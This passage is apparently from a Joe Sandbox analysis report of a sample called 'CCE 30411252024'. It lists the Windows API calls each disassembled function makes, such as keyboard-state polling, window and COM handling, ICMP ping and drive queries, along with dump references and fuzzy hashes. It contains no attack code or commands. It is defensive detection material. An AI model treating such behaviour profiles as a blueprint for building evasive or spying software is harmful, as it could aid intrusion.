                                                                                        • Associated: 00000000.00000002.2159967161.0000000000F9A000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2159982529.0000000000FA4000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_ee0000_CCE 30411252024.jbxd
                                                                                        Similarity
                                                                                        • API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
                                                                                        • String ID: BUTTON
                                                                                        • API String ID: 1194449130-3405671355
                                                                                        • Opcode ID: d37935980eca351c1208705dccf5fe9e0e020fdddfc1d27ff1e56669f723c453
                                                                                        • Instruction ID: b3d7c8d5b9856156ba77644e74abbf9db35423e2df3eb2c24f36a8e165c23a5d
                                                                                        • Opcode Fuzzy Hash: d37935980eca351c1208705dccf5fe9e0e020fdddfc1d27ff1e56669f723c453
                                                                                        • Instruction Fuzzy Hash: 27215CB0B0831DAFEB056B61FC89B66BF69FB46758F140124F51782162CBB29D10FB21
                                                                                        APIs
                                                                                          • Part of subcall function 00EE936C: __swprintf.LIBCMT ref: 00EE93AB
                                                                                          • Part of subcall function 00EE936C: __itow.LIBCMT ref: 00EE93DF
                                                                                        • CoInitialize.OLE32(00000000), ref: 00F3034B
                                                                                        • SHGetSpecialFolderLocation.SHELL32(00000000,00000000,?), ref: 00F303DE
                                                                                        • SHGetDesktopFolder.SHELL32(?), ref: 00F303F2
                                                                                        • CoCreateInstance.OLE32(00F6DA8C,00000000,00000001,00F93CF8,?), ref: 00F3043E
                                                                                        • SHCreateShellItem.SHELL32(00000000,00000000,?,00000003), ref: 00F304AD
                                                                                        • CoTaskMemFree.OLE32(?,?), ref: 00F30505
                                                                                        • _memset.LIBCMT ref: 00F30542
                                                                                        • SHBrowseForFolderW.SHELL32(?), ref: 00F3057E
                                                                                        • SHGetPathFromIDListW.SHELL32(00000000,?), ref: 00F305A1
                                                                                        • CoTaskMemFree.OLE32(00000000), ref: 00F305A8
                                                                                        • CoTaskMemFree.OLE32(00000000,00000001,00000000), ref: 00F305DF
                                                                                        • CoUninitialize.OLE32(00000001,00000000), ref: 00F305E1
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2159874340.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2159854081.0000000000EE0000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F6D000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F8E000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2159967161.0000000000F9A000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2159982529.0000000000FA4000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_ee0000_CCE 30411252024.jbxd
                                                                                        Similarity
                                                                                        • API ID: FolderFreeTask$Create$BrowseDesktopFromInitializeInstanceItemListLocationPathShellSpecialUninitialize__itow__swprintf_memset
                                                                                        • String ID:
                                                                                        • API String ID: 1246142700-0
                                                                                        • Opcode ID: 0e227c0f315010fcdfc7ec2651832a82e69a0b3bb70881245675fc29978e5cdd
                                                                                        • Instruction ID: cddcadf29881b41012b75f026a6ab3072efb2f85465027db457b94277a933cbe
                                                                                        • Opcode Fuzzy Hash: 0e227c0f315010fcdfc7ec2651832a82e69a0b3bb70881245675fc29978e5cdd
                                                                                        • Instruction Fuzzy Hash: EDB1E775A00219AFDB04DFA4C898DAEBBF9FF48314F148469E909EB251DB70ED41DB50
                                                                                        APIs
                                                                                        • GetKeyboardState.USER32(?), ref: 00F22ED6
                                                                                        • SetKeyboardState.USER32(?), ref: 00F22F41
                                                                                        • GetAsyncKeyState.USER32(000000A0), ref: 00F22F61
                                                                                        • GetKeyState.USER32(000000A0), ref: 00F22F78
                                                                                        • GetAsyncKeyState.USER32(000000A1), ref: 00F22FA7
                                                                                        • GetKeyState.USER32(000000A1), ref: 00F22FB8
                                                                                        • GetAsyncKeyState.USER32(00000011), ref: 00F22FE4
                                                                                        • GetKeyState.USER32(00000011), ref: 00F22FF2
                                                                                        • GetAsyncKeyState.USER32(00000012), ref: 00F2301B
                                                                                        • GetKeyState.USER32(00000012), ref: 00F23029
                                                                                        • GetAsyncKeyState.USER32(0000005B), ref: 00F23052
                                                                                        • GetKeyState.USER32(0000005B), ref: 00F23060
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2159874340.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2159854081.0000000000EE0000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F6D000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F8E000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2159967161.0000000000F9A000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2159982529.0000000000FA4000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_ee0000_CCE 30411252024.jbxd
                                                                                        Similarity
                                                                                        • API ID: State$Async$Keyboard
                                                                                        • String ID:
                                                                                        • API String ID: 541375521-0
                                                                                        • Opcode ID: 2c0a8a0b1453aa49bc6b31b813dd179002199e0e11437367ee457e49adb0845a
                                                                                        • Instruction ID: d77ddde7e7918acddbf1bc6af93aa5b624d3958c2c510718fcdd57d2a44ce7e2
                                                                                        • Opcode Fuzzy Hash: 2c0a8a0b1453aa49bc6b31b813dd179002199e0e11437367ee457e49adb0845a
                                                                                        • Instruction Fuzzy Hash: 48513A60E047E839FB35DBA4A8107EEBFF45F11354F08459DC5C24A1C2DA989B4CEB62
APIs
• GetDlgItem.USER32(?,00000001), ref: 00F1ED1E
• GetWindowRect.USER32(00000000,?), ref: 00F1ED30
• MoveWindow.USER32(00000001,0000000A,?,00000001,?,00000000), ref: 00F1ED8E
• GetDlgItem.USER32(?,00000002), ref: 00F1ED99
• GetWindowRect.USER32(00000000,?), ref: 00F1EDAB
• MoveWindow.USER32(00000001,?,00000000,00000001,?,00000000), ref: 00F1EE01
• GetDlgItem.USER32(?,000003E9), ref: 00F1EE0F
• GetWindowRect.USER32(00000000,?), ref: 00F1EE20
• MoveWindow.USER32(00000000,0000000A,00000000,?,?,00000000), ref: 00F1EE63
• GetDlgItem.USER32(?,000003EA), ref: 00F1EE71
• MoveWindow.USER32(00000000,0000000A,0000000A,?,-00000005,00000000), ref: 00F1EE8E
• InvalidateRect.USER32(?,00000000,00000001), ref: 00F1EE9B
Memory Dump Source
• Source File: 00000000.00000002.2159874340.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
• Associated: 00000000.00000002.2159854081.0000000000EE0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2159928574.0000000000F6D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2159928574.0000000000F8E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2159967161.0000000000F9A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2159982529.0000000000FA4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_ee0000_CCE 30411252024.jbxd
Similarity
• API ID: Window$ItemMoveRect$Invalidate
• String ID:
• API String ID: 3096461208-0
• Opcode ID: 9d306f8aee2cf7d351611c373401b6a4f56c506e478dad2c9900970dd3aee0d1
• Instruction ID: d81217cb72f86469de49c6b169e4fbd4ad97fc155f92e8d536ca08484a371d5e
• Opcode Fuzzy Hash: 9d306f8aee2cf7d351611c373401b6a4f56c506e478dad2c9900970dd3aee0d1
• Instruction Fuzzy Hash: BC513271F00209AFDB18CF69DD95AAEBBBAFB88710F14812DF919D7290D7B19D409B10
APIs
  • Part of subcall function 00EFB9FF: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00EFB759,?,00000000,?,?,?,?,00EFB72B,00000000,?), ref: 00EFBA58
• DestroyWindow.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?,?,?,?,00EFB72B), ref: 00EFB7F6
• KillTimer.USER32(00000000,?,00000000,?,?,?,?,00EFB72B,00000000,?,?,00EFB2EF,?,?), ref: 00EFB88D
• DestroyAcceleratorTable.USER32(00000000), ref: 00F5D8A6
• ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,00EFB72B,00000000,?,?,00EFB2EF,?,?), ref: 00F5D8D7
• ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,00EFB72B,00000000,?,?,00EFB2EF,?,?), ref: 00F5D8EE
• ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,00EFB72B,00000000,?,?,00EFB2EF,?,?), ref: 00F5D90A
• DeleteObject.GDI32(00000000), ref: 00F5D91C
Similarity
• API ID: Destroy$ImageList_$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
• String ID:
• API String ID: 641708696-0
• Opcode ID: 5deff18d2da83194ea63d627443b78f67d6c54d346ea4ae7b822c28ff745485f
• Instruction ID: 9ba2ec84e38ecda45abfbb661f15a65c63d59d99678ccea278c2019e11349331
• Opcode Fuzzy Hash: 5deff18d2da83194ea63d627443b78f67d6c54d346ea4ae7b822c28ff745485f
• Instruction Fuzzy Hash: 6161CC70902608DFDB359F18D988B35B7F5FF85366F15111EE642A6AB0C770A880EB80
APIs
  • Part of subcall function 00EFB526: GetWindowLongW.USER32(?,000000EB), ref: 00EFB537
• GetSysColor.USER32(0000000F), ref: 00EFB438
Similarity
• API ID: ColorLongWindow
• String ID:
• API String ID: 259745315-0
• Opcode ID: 29a11d9e6775657077b20d9c729c3a9cc6e2645e48a09e9d9b1ddc781323cf2c
• Instruction ID: 2fd6e4913506a1813323cc3ec49604743e881ce975cb186189f9323da32c1ba8
• Opcode Fuzzy Hash: 29a11d9e6775657077b20d9c729c3a9cc6e2645e48a09e9d9b1ddc781323cf2c
• Instruction Fuzzy Hash: D341CF30501108AFDB206F28DD89BB93B66BB46735F184261FE759E1E6E7B08D41EB21
APIs
Similarity
• API ID: _wcscat_wcscpy$__wsplitpath$_wcschr
• String ID:
• API String ID: 136442275-0
• Opcode ID: 53fcb4fc8f2c4d36ee381c19e86a6a0bee59ceae619866ccfff8ea702e96c62c
• Instruction ID: 9c93759ada794c0fc63b44406ccd91b3011d98d71c7ebd6121317d319d3eeda1
• Opcode Fuzzy Hash: 53fcb4fc8f2c4d36ee381c19e86a6a0bee59ceae619866ccfff8ea702e96c62c
• Instruction Fuzzy Hash: D841417684612CAEDF65DB90DC45DDF73BCEB44310F0041A6B649E2081EE38ABE4AF51
APIs
• CharLowerBuffW.USER32(00F7DC00,00F7DC00,00F7DC00), ref: 00F2D7CE
• GetDriveTypeW.KERNEL32(?,00F93A70,00000061), ref: 00F2D898
• _wcscpy.LIBCMT ref: 00F2D8C2
Strings
Similarity
• API ID: BuffCharDriveLowerType_wcscpy
• String ID: all$cdrom$fixed$network$ramdisk$removable$unknown
• API String ID: 2820617543-1000479233
• Opcode ID: 954e47873227dcd9d488efeb30cfa1f4d8e68e5fa59cc85da49c1b5c1303a3a5
• Instruction ID: f2351b14ce46a9e840c2ebb326e5deebbcbdef7238943c41c8f48caeedd97a88
• Opcode Fuzzy Hash: 954e47873227dcd9d488efeb30cfa1f4d8e68e5fa59cc85da49c1b5c1303a3a5
• Instruction Fuzzy Hash: 4C51C335504358AFD700EF14E881AAEB7E5EF84314F20982DF59A672A2DB31ED05EB42
APIs
• __swprintf.LIBCMT ref: 00EE93AB
• __itow.LIBCMT ref: 00EE93DF
  • Part of subcall function 00F01557: _xtow@16.LIBCMT ref: 00F01578
Strings
Similarity
• API ID: __itow__swprintf_xtow@16
• String ID: %.15g$0x%p$False$True
• API String ID: 1502193981-2263619337
• Opcode ID: 94955704afa2b6995712c0725c27f2b71f7d5590e088592121f850fcf4ffbefa
• Instruction ID: 32d3e3b5aac2d4458024bdbba780f8382659078be49371be93efca4cf9a62083
• Opcode Fuzzy Hash: 94955704afa2b6995712c0725c27f2b71f7d5590e088592121f850fcf4ffbefa
• Instruction Fuzzy Hash: EB410872900208ABDB24DB75DD45EBA73E4EF84314F20446EE649E71C2EA31E941EB11
APIs
• MoveWindow.USER32(?,?,?,000000FF,000000FF,00000000,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?), ref: 00F4A259
• CreateCompatibleDC.GDI32(00000000), ref: 00F4A260
• SendMessageW.USER32(?,00000173,00000000,00000000), ref: 00F4A273
• SelectObject.GDI32(00000000,00000000), ref: 00F4A27B
• GetPixel.GDI32(00000000,00000000,00000000), ref: 00F4A286
• DeleteDC.GDI32(00000000), ref: 00F4A28F
• GetWindowLongW.USER32(?,000000EC), ref: 00F4A299
• SetLayeredWindowAttributes.USER32(?,00000000,00000000,00000001), ref: 00F4A2AD
• DestroyWindow.USER32(?,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?,?,00000000,00000000,?,?), ref: 00F4A2B9
Strings
Similarity
• API ID: Window$AttributesCompatibleCreateDeleteDestroyLayeredLongMessageMoveObjectPixelSelectSend
• String ID: static
• API String ID: 2559357485-2160076837
• Opcode ID: 461aa671d8f71d597b86f5496ea4c7d43a33462c061400627108c47dc2fe8c03
• Instruction ID: 51c0b6f1aba21ec10ee7da643577fd8b751f87e691ad2451bf702d8107b69b40
• Opcode Fuzzy Hash: 461aa671d8f71d597b86f5496ea4c7d43a33462c061400627108c47dc2fe8c03
• Instruction Fuzzy Hash: 36318F31A41119ABDF115FA4DC49FEA3F69FF0E360F100214FA29A60A0C7B6D811FB65
APIs
Strings
Similarity
• API ID: _wcscpy$CleanupStartup_strcatgethostbynamegethostnameinet_ntoa
• String ID: 0.0.0.0
• API String ID: 2620052-3771769585
• Opcode ID: 5b272fed64a51f70978c753f45d09461da88421de89a78b034f8431abc5831de
• Instruction ID: b435b95e5ed108943492d04fff5e260eff1b42d371573177c0d920c8ba6d4386
• Opcode Fuzzy Hash: 5b272fed64a51f70978c753f45d09461da88421de89a78b034f8431abc5831de
• Instruction Fuzzy Hash: AF11E772A04129ABDF14AB70BD49EDA77BCDF40720F040065F515E6091FFB4DE81B661
APIs
• _memset.LIBCMT ref: 00F05047
  • Part of subcall function 00F07C0E: __getptd_noexit.LIBCMT ref: 00F07C0E
• __gmtime64_s.LIBCMT ref: 00F050E0
• __gmtime64_s.LIBCMT ref: 00F05116
• __gmtime64_s.LIBCMT ref: 00F05133
• __allrem.LIBCMT ref: 00F05189
• __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00F051A5
• __allrem.LIBCMT ref: 00F051BC
• __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00F051DA
• __allrem.LIBCMT ref: 00F051F1
• __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00F0520F
• __invoke_watson.LIBCMT ref: 00F05280
                                                                                        Similarity
                                                                                        • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@__gmtime64_s$__getptd_noexit__invoke_watson_memset
                                                                                        • String ID:
                                                                                        • API String ID: 384356119-0
                                                                                        APIs
                                                                                        • _memset.LIBCMT ref: 00F24DF8
                                                                                        • GetMenuItemInfoW.USER32(00FA1708,000000FF,00000000,00000030), ref: 00F24E59
                                                                                        • SetMenuItemInfoW.USER32(00FA1708,00000004,00000000,00000030), ref: 00F24E8F
                                                                                        • Sleep.KERNEL32(000001F4), ref: 00F24EA1
                                                                                        • GetMenuItemCount.USER32(?), ref: 00F24EE5
                                                                                        • GetMenuItemID.USER32(?,00000000), ref: 00F24F01
                                                                                        • GetMenuItemID.USER32(?,-00000001), ref: 00F24F2B
                                                                                        • GetMenuItemID.USER32(?,?), ref: 00F24F70
                                                                                        • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 00F24FB6
                                                                                        • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00F24FCA
                                                                                        • SetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00F24FEB
                                                                                        Similarity
                                                                                        • API ID: ItemMenu$Info$CheckCountRadioSleep_memset
                                                                                        • String ID:
                                                                                        • API String ID: 4176008265-0
                                                                                        APIs
                                                                                        • SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 00F49C98
                                                                                        • SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 00F49C9B
                                                                                        • GetWindowLongW.USER32(?,000000F0), ref: 00F49CBF
                                                                                        • _memset.LIBCMT ref: 00F49CD0
                                                                                        • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00F49CE2
                                                                                        • SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 00F49D5A
                                                                                        Similarity
                                                                                        • API ID: MessageSend$LongWindow_memset
                                                                                        • String ID:
                                                                                        • API String ID: 830647256-0
                                                                                        APIs
                                                                                        • SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,00000000,?), ref: 00F194FE
                                                                                        • SafeArrayAllocData.OLEAUT32(?), ref: 00F19549
                                                                                        • VariantInit.OLEAUT32(?), ref: 00F1955B
                                                                                        • SafeArrayAccessData.OLEAUT32(?,?), ref: 00F1957B
                                                                                        • VariantCopy.OLEAUT32(?,?), ref: 00F195BE
                                                                                        • SafeArrayUnaccessData.OLEAUT32(?), ref: 00F195D2
                                                                                        • VariantClear.OLEAUT32(?), ref: 00F195E7
                                                                                        • SafeArrayDestroyData.OLEAUT32(?), ref: 00F195F4
                                                                                        • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00F195FD
                                                                                        • VariantClear.OLEAUT32(?), ref: 00F1960F
                                                                                        • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00F1961A
                                                                                        Similarity
                                                                                        • API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
                                                                                        • String ID:
                                                                                        • API String ID: 2706829360-0
                                                                                        APIs
                                                                                          • Part of subcall function 00EE936C: __swprintf.LIBCMT ref: 00EE93AB
                                                                                          • Part of subcall function 00EE936C: __itow.LIBCMT ref: 00EE93DF
                                                                                        • CoInitialize.OLE32 ref: 00F3ADF6
                                                                                        • CoUninitialize.OLE32 ref: 00F3AE01
                                                                                        • CoCreateInstance.OLE32(?,00000000,00000017,00F6D8FC,?), ref: 00F3AE61
                                                                                        • IIDFromString.OLE32(?,?), ref: 00F3AED4
                                                                                        • VariantInit.OLEAUT32(?), ref: 00F3AF6E
                                                                                        • VariantClear.OLEAUT32(?), ref: 00F3AFCF
                                                                                        Similarity
                                                                                        • API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize__itow__swprintf
                                                                                        • String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
                                                                                        • API String ID: 834269672-1287834457
                                                                                        APIs
                                                                                        • WSAStartup.WSOCK32(00000101,?), ref: 00F38168
                                                                                        • inet_addr.WSOCK32(?,?,?), ref: 00F381AD
                                                                                        • gethostbyname.WSOCK32(?), ref: 00F381B9
                                                                                        • IcmpCreateFile.IPHLPAPI ref: 00F381C7
                                                                                        • IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 00F38237
                                                                                        • IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0), ref: 00F3824D
                                                                                        • IcmpCloseHandle.IPHLPAPI(00000000), ref: 00F382C2
                                                                                        • WSACleanup.WSOCK32 ref: 00F382C8
                                                                                        Similarity
                                                                                        • API ID: Icmp$EchoSend$CleanupCloseCreateFileHandleStartupgethostbynameinet_addr
                                                                                        • String ID: Ping
                                                                                        • API String ID: 1028309954-2246546115
                                                                                        APIs
                                                                                        • _memset.LIBCMT ref: 00F49E5B
                                                                                        • CreateMenu.USER32 ref: 00F49E76
                                                                                        • SetMenu.USER32(?,00000000), ref: 00F49E85
                                                                                        • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00F49F12
                                                                                        • IsMenu.USER32(?), ref: 00F49F28
                                                                                        • CreatePopupMenu.USER32 ref: 00F49F32
                                                                                        • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 00F49F63
                                                                                        • DrawMenuBar.USER32 ref: 00F49F71
                                                                                        Similarity
                                                                                        • API ID: Menu$CreateItem$DrawInfoInsertPopup_memset
                                                                                        • String ID: 0
                                                                                        • API String ID: 176399719-4108050209
                                                                                        APIs
                                                                                        • SetErrorMode.KERNEL32(00000001), ref: 00F2E396
                                                                                        • GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,00000002,00000001), ref: 00F2E40C
                                                                                        • GetLastError.KERNEL32 ref: 00F2E416
                                                                                        • SetErrorMode.KERNEL32(00000000,READY), ref: 00F2E483
                                                                                        Similarity
                                                                                        • API ID: Error$Mode$DiskFreeLastSpace
                                                                                        • String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
                                                                                        • API String ID: 4194297153-14809454
                                                                                        APIs
                                                                                        • SendMessageW.USER32(?,0000018C,000000FF,00000002), ref: 00F1B98C
                                                                                        • GetDlgCtrlID.USER32 ref: 00F1B997
                                                                                        • GetParent.USER32 ref: 00F1B9B3
                                                                                        • SendMessageW.USER32(00000000,?,00000111,?), ref: 00F1B9B6
                                                                                        • GetDlgCtrlID.USER32(?), ref: 00F1B9BF
                                                                                        • GetParent.USER32(?), ref: 00F1B9DB
                                                                                        • SendMessageW.USER32(00000000,?,?,00000111), ref: 00F1B9DE
                                                                                        Similarity
                                                                                        • API ID: MessageSend$CtrlParent
                                                                                        • String ID: ComboBox$ListBox
                                                                                        • API String ID: 1383977212-1403004172
                                                                                        • Opcode ID: 1e2a3b22469af45b6f5af56fa7440a9344f509c6f8db813110ce75516e0bd0c9
                                                                                        • Instruction ID: 4e709a93f0477b6a48a6b45661ec2891e70210b3e0cae3c65158f0dd1c0be01c
                                                                                        • Opcode Fuzzy Hash: 1e2a3b22469af45b6f5af56fa7440a9344f509c6f8db813110ce75516e0bd0c9
                                                                                        • Instruction Fuzzy Hash: A521C475E00108BFDF04ABA5CC85EFEB7B5EB45310B500115F561A72A1DBB95856FB20
                                                                                        APIs
                                                                                        • SendMessageW.USER32(?,00000186,00000002,00000000), ref: 00F1BA73
                                                                                        • GetDlgCtrlID.USER32 ref: 00F1BA7E
                                                                                        • GetParent.USER32 ref: 00F1BA9A
                                                                                        • SendMessageW.USER32(00000000,?,00000111,?), ref: 00F1BA9D
                                                                                        • GetDlgCtrlID.USER32(?), ref: 00F1BAA6
                                                                                        • GetParent.USER32(?), ref: 00F1BAC2
                                                                                        • SendMessageW.USER32(00000000,?,?,00000111), ref: 00F1BAC5
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2159874340.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2159854081.0000000000EE0000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F6D000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F8E000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2159967161.0000000000F9A000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2159982529.0000000000FA4000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_ee0000_CCE 30411252024.jbxd
                                                                                        Similarity
                                                                                        • API ID: MessageSend$CtrlParent
                                                                                        • String ID: ComboBox$ListBox
                                                                                        • API String ID: 1383977212-1403004172
                                                                                        • Opcode ID: 10698b4a543d81f2d843632813aa203e41d6bb267c78862face063e60059036c
                                                                                        • Instruction ID: e323e1f4e65ce8defc287d2eadeef05d4ae17df6284e4ec0821de3a7e599b537
                                                                                        • Opcode Fuzzy Hash: 10698b4a543d81f2d843632813aa203e41d6bb267c78862face063e60059036c
                                                                                        • Instruction Fuzzy Hash: C321B375E00148BFDF00AB65CC85EFEB7B9EF45300F100015F951A31A1DBB99956BB21
                                                                                        APIs
                                                                                        • GetParent.USER32 ref: 00F1BAE3
                                                                                        • GetClassNameW.USER32(00000000,?,00000100), ref: 00F1BAF8
                                                                                        • _wcscmp.LIBCMT ref: 00F1BB0A
                                                                                        • SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 00F1BB85
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2159874340.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2159854081.0000000000EE0000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F6D000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F8E000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2159967161.0000000000F9A000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2159982529.0000000000FA4000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_ee0000_CCE 30411252024.jbxd
                                                                                        Similarity
                                                                                        • API ID: ClassMessageNameParentSend_wcscmp
                                                                                        • String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
                                                                                        • API String ID: 1704125052-3381328864
                                                                                        • Opcode ID: 4c54d8aa1704ee1024333c0b914fcd64fc492bddd95a8861c84944425c8aeb24
                                                                                        • Instruction ID: ed004df21dfce2c6e84a058e86bc2606974114d241b8623946dbaa0262837a80
                                                                                        • Opcode Fuzzy Hash: 4c54d8aa1704ee1024333c0b914fcd64fc492bddd95a8861c84944425c8aeb24
                                                                                        • Instruction Fuzzy Hash: F21106B7A0C307F9FA24B625DC16EE6779CDB51330F200022F914E54E5EFAAA8917515
                                                                                        APIs
                                                                                        • VariantInit.OLEAUT32(?), ref: 00F3B2D5
                                                                                        • CoInitialize.OLE32(00000000), ref: 00F3B302
                                                                                        • CoUninitialize.OLE32 ref: 00F3B30C
                                                                                        • GetRunningObjectTable.OLE32(00000000,?), ref: 00F3B40C
                                                                                        • SetErrorMode.KERNEL32(00000001,00000029), ref: 00F3B539
                                                                                        • CoGetInstanceFromFile.OLE32(00000000,?,00000000,00000015,00000002), ref: 00F3B56D
                                                                                        • CoGetObject.OLE32(?,00000000,00F6D91C,?), ref: 00F3B590
                                                                                        • SetErrorMode.KERNEL32(00000000), ref: 00F3B5A3
                                                                                        • SetErrorMode.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 00F3B623
                                                                                        • VariantClear.OLEAUT32(00F6D91C), ref: 00F3B633
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2159874340.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2159854081.0000000000EE0000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F6D000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F8E000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2159967161.0000000000F9A000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2159982529.0000000000FA4000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_ee0000_CCE 30411252024.jbxd
                                                                                        Similarity
                                                                                        • API ID: ErrorMode$ObjectVariant$ClearFileFromInitInitializeInstanceRunningTableUninitialize
                                                                                        • String ID:
                                                                                        • API String ID: 2395222682-0
                                                                                        • Opcode ID: eaf9c568a84e218018d4318fe128eacfb57940d23654f11ff5da5f91d4e7b18a
                                                                                        • Instruction ID: e033b4edad6c234559d85be705074f945eb3128b147d11c1bf4527843ae57e07
                                                                                        • Opcode Fuzzy Hash: eaf9c568a84e218018d4318fe128eacfb57940d23654f11ff5da5f91d4e7b18a
                                                                                        • Instruction Fuzzy Hash: BFC12371608305AFC700DF69C894A2BB7E9FF88324F04495DFA8A9B251DB71ED05DB52
                                                                                        APIs
                                                                                        • __lock.LIBCMT ref: 00F0ACC1
                                                                                          • Part of subcall function 00F07CF4: __mtinitlocknum.LIBCMT ref: 00F07D06
                                                                                          • Part of subcall function 00F07CF4: EnterCriticalSection.KERNEL32(00000000,?,00F07ADD,0000000D), ref: 00F07D1F
                                                                                        • __calloc_crt.LIBCMT ref: 00F0ACD2
                                                                                          • Part of subcall function 00F06986: __calloc_impl.LIBCMT ref: 00F06995
                                                                                          • Part of subcall function 00F06986: Sleep.KERNEL32(00000000,000003BC,00EFF507,?,0000000E), ref: 00F069AC
                                                                                        • @_EH4_CallFilterFunc@8.LIBCMT ref: 00F0ACED
                                                                                        • GetStartupInfoW.KERNEL32(?,00F96E28,00000064,00F05E91,00F96C70,00000014), ref: 00F0AD46
                                                                                        • __calloc_crt.LIBCMT ref: 00F0AD91
                                                                                        • GetFileType.KERNEL32(00000001), ref: 00F0ADD8
